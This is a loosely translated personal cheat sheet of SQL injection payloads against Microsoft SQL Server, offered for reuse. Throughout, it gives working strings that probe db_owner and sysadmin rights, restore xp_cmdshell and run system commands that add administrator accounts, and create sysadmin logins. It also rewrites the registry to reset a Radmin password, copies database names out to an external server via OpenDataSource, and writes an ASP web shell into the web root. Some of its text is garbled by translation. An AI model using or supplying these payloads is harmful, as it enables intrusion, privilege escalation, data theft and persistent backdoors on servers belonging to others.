I have a bad memory, so the usual injection code is recorded, a bit messy, but for me, it is very useful, I hope everyone will like.
See what permission it is.
and 1= (Select is_member (' db_owner '))
and char (124)%2bcast (is_member (' db_owner ') as varchar (1))%2bchar (124) =1;--
Detect if there is permission to read a database
and 1= (Select has_dbaccess (' master '))
and char (124)%2bcast (has_dbaccess (' master ') as varchar (1))%2bchar (124) =1--
Number Type
and char (124)%2buser%2bchar (124) =0
Character type
' and char (124)%2buser%2bchar (124) =0 and ' = '
Search Type
' and char (124)%2buser%2bchar (124) =0 and '% ' = '
Burst User Name
and user>0
' and user>0 and ' = '
To detect whether SA permission
and 1= (select Is_srvrolemember (' sysadmin '));--
and char (124)%2bcast (Is_srvrolemember (0x730079007300610064006d0069006e00) as varchar (1))%2bchar (124) =1--
Detection is not a MSSQL database
and exists (SELECT * from sysobjects);
Detect if multiple lines are supported
;d Eclare @d int;--
Restore xp_cmdshell
; exec master.. Dbo.sp_addextendedproc ' xp_cmdshell ', ' Xplog70.dll ';--
SELECT * FROM OPENROWSET (' SQLOLEDB ', ' SERVER=192.168.1.200,1433;UID=TEST;PWD=PAFPAF ', ' SELECT @ @version ')
//-----------------------
Execute command
//-----------------------
First, open the sandbox mode:
EXEC master.. Xp_regwrite ' HKEY_LOCAL_MACHINE ', ' Software\microsoft\jet\4.0\engines ', ' SandboxMode ', ' REG_DWORD ', 1
Then use Jet.oledb to execute system commands
SELECT * FROM OPENROWSET (' microsoft.jet.oledb.4.0 ', ';d atabase=c:\winnt\system32\ias\ias.mdb ', ' Select Shell ' (" cmd.exe/c net user admin Admin1234/add ")"
Execute command
;D eclare @shell INT exec sp_oacreate ' Wscript.Shell ', @shell OUTPUT exec sp_oamethod @shell, ' run ', NULL, ' C:\WINNT\ system32\cmd.exe/c NET user PAF Pafpaf/add ';--
EXEC [Master]. [dbo]. [xp_cmdshell] ' Cmd/c MD c:\1111 '
To determine whether an xp_cmdshell extended stored procedure exists:
http://192.168.1.5/display.asp?keyno=188 and 1= (Select count (*) from master.dbo.sysobjects Where xtype = ' X ' and name = ' xp_cmdshell ')
Write the Registration form
EXEC master.. Xp_regwrite ' HKEY_LOCAL_MACHINE ', ' Software\microsoft\jet\4.0\engines ', ' SandboxMode ', ' REG_DWORD ', 1
Reg_SZ
Read the Registration Form
EXEC master.. Xp_regread ' HKEY_LOCAL_MACHINE ', ' SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ', ' Userinit '
Reading directory content
EXEC master.. Xp_dirtree ' c:\winnt\system32\ ', 1,1
Database backup
Backup DATABASE pubs to disk = ' C:\123.bak '
Burst length
and (Select char (124)%2bcast (Count (1) as varchar (8000))%2bchar (124) from d99_tmp) =0;-
To change the sa password method: After using the SQL Comprehensive tool connection, execute the command:
exec sp_password NULL, ' New password ', ' sa '
User test to add and remove an SA permission:
EXEC master.dbo.sp_addlogin Test,ptlove
EXEC master.dbo.sp_addsrvrolemember Test,sysadmin
To delete a statement that extends the stored procedure xp_cmdshell:
exec sp_dropextendedproc ' xp_cmdshell '
Add extended stored over procedure
EXEC [Master]. Sp_addextendedproc ' Xp_proxiedadata ', ' C:\winnt\system32\sqllog.dll '
GRANT exec/Xp_proxiedadata to public
Stop or activate a service.
EXEC master.. Xp_servicecontrol ' Stop ', ' schedule '
EXEC master.. Xp_servicecontrol ' start ', ' schedule '
Dbo.xp_subdirs
Only the subdirectories under one directory are listed.
Xp_getfiledetails ' C:\Inetpub\wwwroot\SQLInject\login.asp '
Dbo.xp_makecab
Compress multiple files into a target file.
All files to be compressed can be connected to the last side of the parameter column, separated by commas.
Dbo.xp_makecab
' C:\test.cab ', ' Mszip ', 1,
' C:\Inetpub\wwwroot\SQLInject\login.asp ',
' C:\Inetpub\wwwroot\SQLInject\securelogin.asp '
Xp_terminate_process
Deactivate a program in execution, but the parameter given is the process ID.
Using the "Work Manager", the menu "View"-"select fields" Check the PID, you can see the process ID of each executing program
Xp_terminate_process 2484
Xp_unpackcab
Undo the compressed file.
Xp_unpackcab ' C:\test.cab ', ' C:\Temp ', 1
A machine, installed Radmin, the password has been modified, Regedit.exe do not know is deleted or renamed, Net.exe does not exist, there is no way to use regedit/e Import registration files, but MSSQL is SA permissions, use the following command EXEC Master.dbo.xp_regwrite ' HKEY_LOCAL_MACHINE ', ' system\radmin\v2.0\server\parameters ', ' Parameter ', ' reg_binary ', 0X02BA5E187E2589BE6F80DA0046AA7E3C can change the password to 12345678. If you want to modify the port value EXEC master.dbo.xp_regwrite ' HKEY_LOCAL_MACHINE ', ' system\radmin\v2.0\server\parameters ', ' Port ', ' reg_ BINARY ', 0xd20400 the port value to 1234
Create Database lcx;
Create TABLE ku (name nvarchar (256) null);
Create TABLE Biao (id int null,name nvarchar (256) NULL);
Get database name
Insert INTO OpenDataSource (' SQLOLEDB ', ' server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx '). Lcx.dbo.ku Select name from master.dbo.sysdatabases
Create a table in master to see how permissions
Create TABLE Master ... D_test (ID nvarchar (4000) null,data nvarchar (4000) NULL);--
Write a sp_makewebtask directly in the Web directory:
Http://127.0.0.1/dblogin123.asp?username=123 '; exec%20sp_makewebtask%20 ' d:\www\tt\88.asp ', '%20select%20 ' <% 25execute (Request ("a"))%25> '%20 ';--
Update table Contents
Update films SET kind = ' dramatic ' Where id = 123
Delete Content
Delete from table_name where Stockid = 3